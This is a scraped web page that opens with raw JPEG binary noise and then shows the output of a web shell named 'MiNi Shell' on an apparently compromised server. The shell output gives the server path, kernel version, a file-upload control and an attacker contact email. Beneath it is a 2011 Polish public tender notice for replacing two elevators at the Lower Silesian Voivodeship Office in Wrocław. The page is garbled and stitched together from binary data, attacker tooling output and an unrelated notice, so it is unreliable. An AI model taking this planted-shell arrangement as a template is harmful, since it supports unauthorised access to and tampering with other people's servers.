JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110603/156517-N-2011.html

<p class="kh_header"><b>Wrocław: Wymiana dźwigu towarowo/osobowego oraz windy osobowej  w budynku administracyjnym  Dolnośląskiego Urzędu Wojewódzkiego we Wrocławiu przy pl. Powstańców Warszawy 1 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 156517 - 2011; data zamieszczenia: 03.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Urząd Wojewódzki , pl. Powstańców Warszawy 1, 50-951 Wrocław, woj. dolnośląskie, tel. 071 3406243, faks 071 3406806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.duw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana dźwigu towarowo/osobowego oraz windy osobowej  w budynku administracyjnym  Dolnośląskiego Urzędu Wojewódzkiego we Wrocławiu przy pl. Powstańców Warszawy 1 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na dostawie i montażu:
- dźwigu osobowo/towarowego wraz z pracami budowlanymi i instalacyjnymi ,
-  windy osobowej wraz z pracami budowlanymi i instalacyjnymi. 
ZAKRES ZAMÓWIENIA

1.	Dostawa i montaż dźwigu osobowo/towarowego wraz z pracami budowlanymi i instalacyjnymi 
1.1	Zakres zamówienia obejmuje: 
1)	opracowanie dokumentacji projektowej w zakresie koniecznym do wykonania zadania, 
uzyskania wszelkich wymaganych opinii, uzgodnień, zatwierdzeń i pozwoleń w tym pozwolenie na budowę lub uzyskanie przez Wykonawcę zaświadczenia o braku sprzeciwu do zgłoszenia zamiaru wykonania zadania, 
2)	Demontaż istniejącego dźwigu osobowo/towarowego wraz z wyposażeniem,
     3) Przygotowanie szybu windowego poprzez malowanie farbą niepalną,
4) Wymianę oświetlenia szybu dźwigowego,
5) Wymianę lin nośnych na nowe (dopuszcza się zastosowanie pasów nośnych). Środki trakcyjne 
    powinny być tak skonstruowane, aby ograniczyć wytwarzanie hałasu do minimum oraz 
    zapewnić długi okres eksploatacji bez konieczności ich wymiany,
6) Wymianę zderzaków sprężynowych w podszybiu pod kabiną i przeciwwagą na zderzaki 
    spełniające wymagania EN81.1,
7) Wymianę prowadnic kabinowych oraz przeciwwagowych,
8) Wymianę zasilania elektrycznego od tablicy głównej do maszynowni dźwigu 
    osobowo/towarowego,
9) Dostawę dźwigu elektrycznego wraz z oprzyrządowaniem i montażem w istniejącym szybie 
    wew. dźwigu. Dźwig fabrycznie nowy wyprodukowany po 1 stycznia 2011 roku spełniający 
    warunki polskiej oraz europejskiej normy,
10) Podłączenie dźwigu do istniejącej instalacji elektrycznej, 
11) Wykonanie prób, odbioru i rozruchu urządzenia dźwigowego z udziałem wymaganych 
      instytucji, w tym Urzędu Dozoru Technicznego i Zamawiającego, 
12) Dopuszczenie do eksploatacji i rejestrację windy w Urzędzie Dozoru Technicznego, 
13) Dostarczenie dokumentacji technicznej dźwigu (DTR) z instrukcją obsługi, konserwacji 
      i eksploatacji w języku polskim, 
14) Przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu. 

1.2 Dane dotyczące windy osobowo/towarowej  

1)	Winda musi posiadać wymiary pozwalające na zamontowanie jej w szybie betonowym 
o wymiarach:  szerokość 2400 mm, głębokość 1400 mm, wysokość podnoszenia ok. 20 metrów,
2) Winda musi spełniać następujące parametry techniczne: 
a) typ dźwigu - osobowo/towarowy  przystosowany dla osób niepełnosprawnych na wózkach 
    inwalidzkich, 
b) Udźwig min. 800 kg i min. 10 osób, 
c) Napęd  bezreduktorowy ( zespół napędowy może być umieszczony w szybie
    windowym), zapewniający łagodne starty i zatrzymania, łagodną jazdę kabiny. Zespół 
    napędowy powinien zapewniać dużą trwałość eksploatacyjną przy jednoczesnym niskim 
    zużyciu energii elektrycznej. Zespół napędowy nie może przenosić drgań na konstrukcję        
    budynku. Prędkość jazdy dźwigu 1m/s,
d) wymogi Zamawiającego dotyczące standardu kabiny: 
- przelotowa, metalowa, front kabiny wykonany ze stali nierdzewnej szlifowanej,
- wyposażona w drzwi automatyczne  ze stali nierdzewnej,
- czytelny panel sterujący wyposażony w elektroniczny wskaźnik  położenia kabiny w szybie oraz 
  akustyczny sygnalizator dojazdu kabiny do przystanku, 
- adaptowana pod potrzeby wygodnego użytkowania przez osoby niepełnosprawne, 
- podłoga kabiny - wykładzina antypoślizgowa, niepalna, trudnościeralna, 
- wyposażona w instalację kaset wezwań  dostosowaną do nowego sterowania mikroprocesowego, 
  z wyświetlaczem na wszystkich przystankach,
- wyposażona  w poręcz, lustro, kluczyk blokujący drzwi kabiny, informację głosową w kabinie 
  oraz oświetlenie awaryjne min 2 h.
- drzwi  automatyczne ze stali nierdzewnej teleskopowe, 
     f) Awaryjny dojazd do najbliższego przystanku w przypadku zaniku napięcia oraz zapewnienie 
  łączności ze służbami ratunkowymi. Komunikacja między kabiną a centrum serwisowym zgodnie
       z normą EN 81-28,
h) Ilość przystanków - 5, 
i) Ilość dojść - 5, 
j) Dostęp do ostatniego przystanku odbywać się będzie za pomocą kodu (Pinu),

1.3	Dokumentacja oraz wszystkie instrukcje muszą być napisane w języku polskim, 
1.4    Koszty związane z odbiorem, rejestracją oraz dopuszczeniem dźwigu do eksploatacji 
przez Urząd Dozoru Technicznego ponosi Wykonawca. 

2. Dostawa i montaż dźwigu osobowego wraz z pracami budowlanymi i instalacyjnymi 
2.1	Zakres zamówienia obejmuje: 
1)	opracowanie dokumentacji projektowej w zakresie koniecznym do wykonania zadania, 
uzyskania wszelkich wymaganych opinii, uzgodnień, zatwierdzeń i pozwoleń w tym pozwolenie na budowę lub uzyskanie przez Wykonawcę zaświadczenia o braku sprzeciwu do zgłoszenia zamiaru wykonania zadania.
2)	Demontaż istniejącego dźwigu osobowego wraz z wyposażeniem.
3)	Przygotowanie szybu windowego poprzez malowanie farbą niepalną.
4)	Wymianę oświetlenia szybu dźwigowego.
5)	Wymianę lin nośnych na nowe (dopuszcza się zastosowanie pasów nośnych). Środki trakcyjne powinny być tak skonstruowane, aby ograniczyć wytwarzanie hałasu do minimum oraz zapewnić długi okres eksploatacji bez konieczności ich wymiany.
6)	Wymianę zderzaków sprężynowych w podszybiu pod kabiną i przeciwwagą na zderzaki spełniające wymagania EN81.1.
7)	Wymianę prowadnic kabinowych oraz przeciwwagowych.
8)	Wymianę zasilania elektrycznego od tablicy głównej do maszynowni dźwigu osobowego.
9)	Dostawę dźwigu elektrycznego wraz z oprzyrządowaniem i montażem w istniejącym szybie wew. dźwigu. Dźwig fabrycznie nowy wyprodukowany po 1 stycznia 2011 roku spełniający warunki polskiej oraz europejskiej normy.
10)	Podłączenie dźwigu do istniejącej instalacji elektrycznej. 
11)	Wykonanie prób, odbioru i rozruchu urządzenia dźwigowego z udziałem wymaganych instytucji, w tym Urzędu Dozoru Technicznego i Zamawiającego.
12)	dopuszczenie do eksploatacji i rejestrację windy w Urzędzie Dozoru Technicznego.
13)	Dostarczenie dokumentacji technicznej dźwigu (DTR) z instrukcją obsługi, konserwacji i eksploatacji w języku polskim.
14)	 Przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu. 

2.2. Dane dotyczące windy osobowej 

1)	Winda musi posiadać wymiary pozwalające na zamontowanie jej w szybie betonowym o 
wymiarach:  szerokość  1600 mm, głębokość   1700 mm wysokość podnoszenia ok. 17 metrów.
2)	Winda musi spełniać następujące parametry techniczne: 
    a) Typ dźwigu - osobowy  przystosowany dla osób niepełnosprawnych na wózkach inwalidzkich, 
b)	Udźwig min. 600 kg i min. 7 osób, 
c)	napęd bezreduktorowy ( zespół napędowy może być umieszczony w szybie windowym), zapewniający łagodne starty i zatrzymania, łagodną jazdę kabiny. Zespół napędowy powinien zapewniać dużą trwałość eksploatacyjną przy jednoczesnym niskim zużyciu energii elektrycznej. Zespół napędowy nie może przenosić drgań na konstrukcję budynku. Prędkość jazdy dźwigu 1m/s.,
3.2.3 wymogi Zamawiającego dotyczące standardu kabiny: 
        a) metalowa, front kabiny wykonany ze stali nierdzewnej szlifowanej,
        b) wyposażona w drzwi automatyczne  ze stali nierdzewnej,
        c) wyposażona w czytelny panel sterujący wyposażony w elektroniczny wskaźnik  położenia 
            kabiny w szybie oraz akustyczny sygnalizator dojazdu kabiny do przystanku, 
        d) adaptowana pod potrzeby wygodnego użytkowania przez osoby niepełnosprawne, 
        e) podłoga kabiny - wykładzina antypoślizgowa, niepalna, trudnościeralna, 
         f) kasety wezwań  dostosowane do nowego sterowania mikroprocesowego, wyposażone 
            w wyświetlacz na wszystkich przystankach,
          g) wyposażona w poręcz, lustro, kluczyk blokujący drzwi kabiny, informację głosową w kabinie 
            oraz oświetlenie awaryjne min 2 h.
         h) drzwi szybowe automatyczne ze stali nierdzewnej teleskopowe, 
         i) awaryjny dojazd do najbliższego przystanku w przypadku zaniku napięcia, łączność ze 
            służbami ratunkowymi,
         j) Komunikacja między kabiną a centrum serwisowym zgodnie z normą EN 81-28,
         k) Ilość przystanków - 5, 
         l) Ilość dojść - 5 
2.4. Dokumentacja oraz wszystkie instrukcje muszą być napisane w języku polskim, 
2.5 Koszty związane z odbiorem, rejestracją oraz dopuszczeniem dźwigu do eksploatacji przez Urząd Dozoru Technicznego ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.45.30.00-7, 45.31.00.00-3, 45.31.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy posiadają wiedzę i doświadczenie tzn: 	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali roboty budowlane odpowiadające swoim rodzajem i wielkością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania tj. 
- minimum 3 dostawy wraz z montażem wind osobowych lub dźwigów osobowo/ 
  towarowych z załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy dysponują osobami zdolnymi do realizacji zamówienia, posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie niezbędnym do wykonania przedmiotu zamówienia w rozumieniu ustawy z dnia 07.07.1994r. Prawo Budowlane (tekst jednolity Dzz.U z 2008r. Nr 156, poz. 1118 z późniejszymi zamianami) lub posiadającymi uprawnienia budowlane w zakresie n/w specjalności uzyskanych przed wejściem w życie w/w Ustawy Prawo Budowlane tzn:kierownikiem budowy, który posiada uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności instalacji elektrycznych będącym członkiem właściwej izby samorządu zawodowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo-W przypadku podpisywania oferty przez osoby niewymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy
W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp).
Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmianę terminu realizacji przedmiotu Umowy w przypadku:
1.1.	Wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w § 2 Umowy
1.2.	Wystąpienia robót dodatkowych, nieobjętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
-	z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub
-	wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, 
a wykonanie zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego w terminie umownym,
1.3.	nieprzekazania przez Zamawiającego terenu budowy w terminie określonym w umowie,
1.4.	wstrzymania przez Zamawiającego wykonywania robót,

We wszystkich przypadkach określonych w punktach od 3.1.1 do 3.1.6., termin realizacji może ulec przedłużeniu, nie dłużej jednak niż o czas trwania okoliczności. 

2.	Zamawiający dopuszcza dokonanie zmiany kierownika budowy  na wniosek Wykonawcy w przypadku:
2.1.	choroby lub innych zdarzeń losowych dotyczących kierownika budowy.
2.2.	 nie wywiązywania się kierownika budowy z obowiązków wynikających z umowy,
2.3.	jeżeli zmiana kierownika budowy stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji),
3.	Zmiany kierownika budowy na wniosek Zamawiającego w przypadku, gdy nie wykonuje on swoich obowiązków wynikających z Umowy. 
W przypadku zmiany kierownika budowy - nowy kierownik budowy musi spełniać wymagania określone w SIWZ dla danego specjalisty.
4.	Zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę.
5.	Zmiany ustawowej wysokości podatku VAT w przypadku, gdy w trakcie realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem Umowy, Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
6.	Zmiany w zakresie zmniejszenia zakresu rzeczowego zamówienia, co w konsekwencji prowadzić może do odpowiedniego zmniejszenia wynagrodzenia Wykonawcy, gdy zmiana taka jest korzystna dla interesu publicznego.
7	 Okoliczności przewidziane powyżej stanowiące podstawę zmiany Umowy stanowią uprawnienie Zamawiającego a nie jego obowiązek</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.duw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Urząd Wojewódzki, Pl. Powstańców Warszawy 1, 50-950 Wrocław pok. 0212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2011 godzina 10:00, miejsce: Dolnośląski Urząd Wojewódzki, Pl. Powstańców Warszawy 1, 50-950 Wrocław pokój nr 0200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com